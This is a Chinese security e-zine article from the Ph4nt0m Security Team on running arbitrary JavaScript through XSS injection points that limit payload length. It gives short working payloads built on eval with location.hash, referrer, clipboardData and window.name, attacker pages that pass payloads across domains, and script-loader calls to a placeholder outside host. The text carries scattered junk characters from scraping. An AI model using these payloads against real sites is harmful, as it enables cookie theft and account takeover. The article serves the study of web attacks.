[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==

$ p3 M6 E2 d. s' k# g: ]                       Issue 0x03, Phile #0x04 of 0x07
4 n0 ^! e" w7 [/ S% _+ j2 T( |+ B

: y$ @* Z( j2 C9 ?" T# B|=---------------------------------------------------------------------------=|
: V2 O: j' V& y5 E|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
  v8 Q- o' d& k: i|=---------------------------------------------------------------------------=|
3 ^' c, K/ T* O& {8 _* Z|=---------------------------------------------------------------------------=|
' T- o% V/ E' M7 J5 p, R6 F|=------------------------=[      By luoluo     ]=---------------------------=|
|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
|=---------------------------------------------------------------------------=|
, {" ]) B6 M* S/ a# A9 p/ Z
  A2 \3 S* R' s, _* J+ h0 h7 F
[目录]
/ z& O$ @% k5 h
1. 综述
2. 突破方法
/ c' B3 m+ c2 Q/ z  |8 Z( U# q! q  2.1 利用HTML上下文中其他可以控制的数据
3 q0 `1 _" D! X, o- J5 g  2.2 利用URL中的数据
6 y& N% X' P1 Y% z  2.3 JS上下文的利用
7 o  v6 f  ]/ k, r  ^# Q: [0 b  2.4 利用浏览器特性在跨域的页面之间传递数据
    2.4.1 document.referrer
    2.4.2 剪切板clipboardData
    2.4.3 窗口名window.name
  2.5 以上的方式结合使用
3. 后记
4. 参考


一、综述
& A- h% Z' {1 Y+ t* g& G& t
- _) A2 ]! @9 _' n6 V    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
, n2 a, b/ g6 z0 S1 r% U要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
' t% o' r- `& h1 B" i人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
极端情况下的XSS漏洞。
' P. i$ V! r* P5 _5 y. ?$ p: h- z
% D+ H. r* b, ?2 o6 X    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
据。
; z* {; g5 m& {( [- [
, l7 j; N( A! y  m5 k
; N2 Q# J1 [& ~3 B% D" Q8 [1 `& R: a二、突破方法
8 }- i  b) N7 K! X& B- x5 z
) G& F9 y, \" D8 n) d: u2.1 利用HTML上下文中其他可以控制的数据
" ?" I+ H; v9 `2 A
& K& g# p) \/ z3 a6 u    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
) |8 ~. v* _. g0 e) ]6 B% r: L# U制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：
; U. N, z- X6 r( C. M
--code-------------------------------------------------------------------------
<div id="x">可控的安全的数据</div>
) E3 h0 X6 t/ d  g, o- }6 Y0 J. Y<limited_xss_point>alert(/xss/);</limited_xss_point>
, O  z1 f. G: l) A-------------------------------------------------------------------------------

    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：

--code-------------------------------------------------------------------------
1 K* j: i& H: ?9 p. `' X2 g<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
7 P! S  A# E* b# t$ G3 ~; g-------------------------------------------------------------------------------
1 d* s/ I1 X8 ]# f# F! t: D
& l/ y+ s- d( |8 `0 m长度：28 + len(id)
1 `0 a9 l; Y/ R6 b5 c7 @* i
    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。


/ d: E) I( U$ H0 I( h# x9 h+ |( F# @2.2 利用URL中的数据
$ ?5 T6 T1 S- W1 N) y" R
    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
+ [3 S8 }  p3 F9 l9 c- V控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
4 n" q- K% o7 n+ G4 I( Idocument.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
  }7 A1 X, x4 {& a! Z# Q最后：

/ h/ \8 h1 V7 ]* A  O# i; S--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)

<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
( t) v7 E* Y! Y, e+ J0 R7 b! w-------------------------------------------------------------------------------

长度：30

--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------

长度：31
! C' M# I/ F" A+ M/ F
    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
/ O0 \" I/ W: I字符：

--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
9 ~, h, n' h; L1 @
/ I# g# I3 [: V+ F8 K长度：29
+ n+ ?5 p4 x1 k* k* q
--code-------------------------------------------------------------------------
& A; k& i$ m: b, t" j<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
$ j" g# x$ _, w* h+ L-------------------------------------------------------------------------------
" T' o7 x% |2 C' M% K' `9 x6 k& v
长度：30

    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：
8 Z# k2 L# |9 \' V
4 \. i1 R4 ]  R' M7 @; H--code-------------------------------------------------------------------------
. o9 d) P7 y7 Q" k7 Z, `$ d7 rhttp://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
: ?+ m/ N- p2 g* m: R% @
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
5 E3 q+ E) J7 }4 }-------------------------------------------------------------------------------
7 A. u, _# O) k: C
1 u7 d6 s' ~5 m5 m: a7 E长度：29
  X* f! s3 l* H- W4 H" k
    这样比上面的例子又少了一个字符。那么还可以更短么？
  r  b# V% o# ]2 v
& f8 i$ |5 {8 P: v7 e3 i
2.3 JS上下文的利用

    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：

String.fromCharCode
getElementById
" m& ?: h" b" F6 a* r) d3 b: m: SgetElementsByTagName
2 v" z6 B' d# \0 n& r( Edocument.write
9 ^; _6 T+ T9 Y+ c+ m& y0 T4 H+ a$ s; HXMLHTTPRequest
" |  j3 m) z8 \...
: A$ x1 G( A+ j. Q: k, M
1 t* W$ n. Z- D    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
简化函数，最经典的例子就是：
  f' Q+ a0 k+ @5 r
8 B5 b  D% [1 `$ {% N/ v5 Q1 @--code-------------------------------------------------------------------------
! L* K6 Z9 W2 x( Q* l2 e8 n1 Ofunction $(id) {
+ K  p) B" ^  R0 n        return document.getElementById(id);
& @. `8 f/ `7 H- `' N0 r}
-------------------------------------------------------------------------------

    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
' L' D, o  a0 Q, a最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：

. ~. ]9 `* C. h: }. E# `% I--code-------------------------------------------------------------------------
7 R! ]5 M9 B7 ^# [0 k  y; x  Ufunction loads(url) {
        ...
        document.body.appendChild(script);
+ f" ^+ y' V& R( B  |0 ^}
4 f' K1 D' j( F# j
( i* q4 D, @; V/ i<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
& l9 s6 W) c$ R5 t-------------------------------------------------------------------------------

# x$ X5 V3 i: i长度：len(函数名) + len(url) + 5
4 f& v# M' w: ]  ]( \- T
    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：

--code-------------------------------------------------------------------------
function get(url) {
        ...
4 I! Z/ C; Q5 Z7 k        return x.responseText;
* C* b8 R9 O% j% h, \* O5 N8 w}

1 D2 s0 p7 L9 y1 J. M& c<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
0 y  }( u2 R' K-------------------------------------------------------------------------------
+ g$ P/ B4 }: X' Z7 d4 `8 L
长度：len(函数名) + len(url) + 11
4 m+ H4 M+ A, T' K" L2 {# L
    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：

JQuery
YUI
5 k+ @/ s  T4 I: r! g...

    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
  y$ Q( L( B( V2 k们的代码，进而突破长度限制执行任意代码。
  W% E4 Y1 u$ U! N! @, P- w% m6 j

! |! B2 o+ r' x+ h5 H2.4 利用浏览器特性在跨域的页面之间传递数据

    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。

2.4.1 document.referrer

0 D1 r0 ]9 O, F6 |    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
Payload，被XSS的页面通过referrer获取相关代码执行。

攻击者构造的的页面：

--code-------------------------------------------------------------------------
- z2 f, n" _5 L. i9 k3 `" dhttp://www.a.com/attack.html?...&alert(document.cookie)
4 V2 q) Q; L5 U& v1 D; b1 K- k
<a href="http://www.xssedsite.com/xssed.php">go</a>
% S* K  l7 i8 O/ \% X/ |, ]-------------------------------------------------------------------------------

& D( H6 c, R' C% }5 m  X被XSS的页面：

--code-------------------------------------------------------------------------
% D, E+ M3 Q' N! {8 f. F. Z* w  u<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
5 a, [! o0 Y. O: g-------------------------------------------------------------------------------
# x/ S; r2 j( V; [( d
3 d% H* n- j& {长度：34

4 u, K! e; p1 a8 s- u    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
5 A6 ^  I0 |/ J7 k3 M$ N9 }5 y# m0 v' @比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：
* v! Y7 Q( z; f+ x
; j6 m5 |0 ?; D4 b" c1 m- N% G--code-------------------------------------------------------------------------
<script type="text/javascript">
: w' G7 F* C( S2 V) i<!--
window.onload = function(){
        var f = document.createElement("form");
' B) Z+ e9 L+ ~% s. @% v        f.setAttribute("method", "get");
: `* C' v3 o6 O- B2 i" K0 m6 w        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
( U' s3 ?6 @. [. G: _        document.body.appendChild(f);
        f.submit();
3 k; p4 Z4 b0 T$ E: a& ^- l' x};
7 q. W! B8 g/ ~# J- H//-->
</script>
5 t  K, W) W2 s/ T9 E* d/ W-------------------------------------------------------------------------------
, i2 r) W5 j6 K& F
' K2 V3 m9 M: J4 }
5 x# H0 }" N$ V5 F2.4.2 剪切板clipboardData
) v4 W$ \( y7 y7 W4 {( a0 m; r5 ]
6 x8 I; O7 h# ~7 y    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
, o- R# k0 k+ A. R" P' k取并执行该数据。
; U- c  o, b% p
, R# U  ^0 O; Z7 ?' \攻击者构造的页面：
, Q1 ]  R- T! i) d3 k
" ^- f) M2 q8 Z9 S--code-------------------------------------------------------------------------
<script>
clipboardData.setData("text", "alert(document.cookie)");
</script>
-------------------------------------------------------------------------------
7 x! }, C1 J  B4 x" @% f- s
! g0 |, H8 W: L9 e) V. o$ U5 d8 P% G被XSS的页面：

--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
& v! t' ]. N9 v, R-------------------------------------------------------------------------------

4 l$ i  E# R; ~% W长度：36
1 r( A! \% ^3 M, R7 Q) j
- U/ z% S1 G0 k- d5 `. b- |    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。

9 I* g) }/ q# V' Y; d
2.4.3 窗口名window.name

- |1 X+ }2 ]( C/ v    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
" l- }1 U: t, X- S  D2 S# ^" u% k据的，但是这个特性本身并不是漏洞。

    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
2 V9 I6 a+ ^5 h3 ~( |/ N5 B窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
& V( L- }0 t& C5 Y$ D% A需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
$ D, Q2 c6 j+ \7 R/ O或者VBS。

    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：
1 `+ I1 Y9 N7 r: R
% [* m, Q4 {& D攻击者构造的页面：

4 O/ C' i5 C! w/ Z- l2 Q--code-------------------------------------------------------------------------
<script>
window.name = "alert(document.cookie)";
1 S: g+ ]! K, }% h7 wlocaton.href = "http://www.xssedsite.com/xssed.php";
</script>
& g5 ]. F( v# n% O. s0 a-------------------------------------------------------------------------------

3 K, }1 Y  R( _; N2 v* a被XSS的页面：

--code-------------------------------------------------------------------------
. v( E' N  x! v) _/ @( X& v<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
" l2 m5 D& @" S: A& M% A: T8 V  B* @6 T
6 W5 X1 `+ Q! n$ r6 r- C& C3 J长度：11

& R& _, n) B9 m8 a2 ~2 m    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
; D) k% W& Y8 x& p" J9 ^7 Y  L的技巧，这个技巧的发现也是促成本文的直接原因。

    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
章来探讨。
: |. v2 G9 r/ M+ L' ~: s

2.5 以上的方式结合使用

& A& m. q: X0 y( Z' j) H0 T    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
5 V' X$ X$ s" C" B: I9 n# L9 g4 `3 [& [9 }中，灵活的组合上面的方法可能会起到奇效。
# y: C* f! B( l8 h6 ?7 r

三、后记
3 ~9 t( `0 }1 [+ L4 K1 J  `
    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
和我交流！
! B5 V! Y0 t' N  Q8 j4 z
    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！

    本文是纯粹的技术探讨，请勿用于非法用途！
# j. n0 b: c" U  R
8 P7 ]; [# B/ h- }! }; U; ^: R- q
四、参考

/ ~8 g  z6 y0 D3 Shttp://msdn.microsoft.com/en-us/library/aa155073.aspx

8 ?3 I. a: x; ]: g" f-EOF-